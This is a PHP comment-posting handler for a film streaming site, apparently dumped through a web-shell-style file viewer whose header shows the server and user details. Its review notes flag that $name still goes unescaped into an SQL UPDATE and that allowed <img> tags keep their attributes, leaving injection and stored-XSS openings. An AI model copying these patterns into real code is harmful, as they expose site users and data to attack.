

Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/ajax/


 

Current File : /var/www/html/netphim/code/ajax/send_comment.php
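<?php
// AJAX handler: stores a comment (or a reply to an existing comment) on a film/episode
// and echoes a JSON object with `comment_id_insert` and `comment_status`.
// $CORE, $DB, $ob_user and badWords() are expected to be provided by the including script.

// Numeric identifiers are cast to int before they are placed in any SQL string, so a
// request value can no longer alter the structure of the queries below.
$phim_id    = (int) ($CORE->input['phim_id'] ?? 0);
$epi        = (int) ($CORE->input['epi'] ?? 0);
$comment_id = (int) ($CORE->input['comment_id'] ?? 0);
$name       = $CORE->input['name'] ?? '';
$user_id    = $CORE->input['user_id'] ?? 0;
$content    = $CORE->input['content'] ?? '';

// Entities are decoded twice and the result is reduced to <img>, <br> and <p>.
// NOTE(review): strip_tags() filters tag names only; attributes on the allowed tags are
// kept as submitted. If comment_content is ever rendered as raw HTML, attribute-level
// filtering (or output encoding) is still required at render time.
$content = html_entity_decode(html_entity_decode($content));
$content = strip_tags($content, "<img><br><p>");

// Reply metadata: when comment_id is given, the new comment becomes a child of it.
$user_id_reply = $parent_id = 0;
$user_id_reply_name = '';
if ($comment_id > 0) {
    $r_comment = $DB->fetch_row($DB->query("SELECT * FROM tb_comment WHERE comment_id='$comment_id'"));
    // The parent row may not exist; fall back to the "no reply" defaults instead of reading a missing row.
    $user_id_reply = $r_comment['user_id_post'] ?? 0;
    $user_id_reply_name = $r_comment['user_id_post_name'] ?? '';
    $parent_id = $comment_id;
}

// Defined up front so the response below is well-formed (null values, no undefined-variable
// notices) when the request is rejected and nothing is inserted.
$comment_id_insert = null;
$txt_status = null;

// The posted user_id must be exactly the id of the current $ob_user. A strict string
// comparison is used so that a value which merely compares loosely equal (for example a
// number followed by extra characters) is rejected before it reaches the SQL below.
$is_current_user = is_scalar($user_id) && (string) $user_id === (string) $ob_user->user_id;

if ($name != '' and $is_current_user) {
    // Load the banned-word list; a match stores the comment as 'locked' instead of 'active'.
    $arr_bad_word = [];
    $q_bankw = $DB->query("SELECT * FROM tb_bankw ORDER BY bankw_name");
    while ($r_bankw = $DB->fetch_row($q_bankw)) {
        $arr_bad_word[] = $r_bankw['bankw_name'];
    }
    $txt_status = badWords(html_entity_decode($content), $arr_bad_word) ? 'locked' : 'active';

    $r_phim = $DB->fetch_row($DB->query("SELECT * FROM tb_phim WHERE phim_id='$phim_id' "));

    // A negative episode index means the comment is not attached to an episode.
    $epi_name = $epi_slug = '';
    if ($epi >= 0) {
        $r_epi = $DB->fetch_row($DB->query("SELECT server_data FROM tb_epi WHERE phim_id='$phim_id' "));
        $arr_data = json_decode($r_epi['server_data'] ?? '', true);
        // server_data may be missing, malformed, or lack this episode index.
        $epi_name = $arr_data[$epi]['name'] ?? '';
        $epi_slug = $arr_data[$epi]['slug'] ?? '';
    }

    // NOTE(review): $name is request data interpolated into a quoted SQL literal. Whether
    // $CORE->input already neutralises quotes and backslashes is not visible in this file;
    // this statement should go through the DB layer's parameterised or escaping API.
    // (The original issued this identical UPDATE twice; one execution is sufficient.)
    $DB->query("UPDATE tb_guest SET guest_fullname='$name' WHERE user_id='".$user_id."' ");

    $arr_insert = [
        'parent_id'          => $parent_id,
        'phim_id'            => $phim_id,
        'phim_name'          => $r_phim['name'] ?? '',
        'phim_slug'          => $r_phim['slug'] ?? '',
        'epi'                => $epi,
        'epi_name'           => $epi_name,
        'epi_slug'           => $epi_slug,
        'user_id_post'       => $user_id,
        'user_id_post_name'  => $name,
        'user_id_img'        => $ob_user->guest_avatar,
        'user_id_reply'      => $user_id_reply,
        'user_id_reply_name' => $user_id_reply_name,
        'comment_content'    => $content,
        'like_num'           => 0,
        'dislike_num'        => 0,
        'have_report'        => 0,
        'time_post'          => time(),
        'comment_status'     => $txt_status,
    ];
    $comment_id_insert = $DB->do_insert('tb_comment', $arr_insert);

    // Refresh the film's cached comment counter from the actual row count.
    $r_count = $DB->fetch_row($DB->query("SELECT count(*) as total FROM tb_comment WHERE phim_id='$phim_id' "));
    $total_comments = (int) ($r_count['total'] ?? 0);
    $DB->query("UPDATE tb_phim SET phim_hitcomment='".$total_comments."' WHERE phim_id='$phim_id' ");
}

// For a new top-level comment report the inserted id; for a reply report the parent id.
$arr = [];
$arr['comment_id_insert'] = ($comment_id == 0) ? $comment_id_insert : $comment_id;
$arr['comment_status'] = $txt_status;
echo json_encode($arr);
exit();
?>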
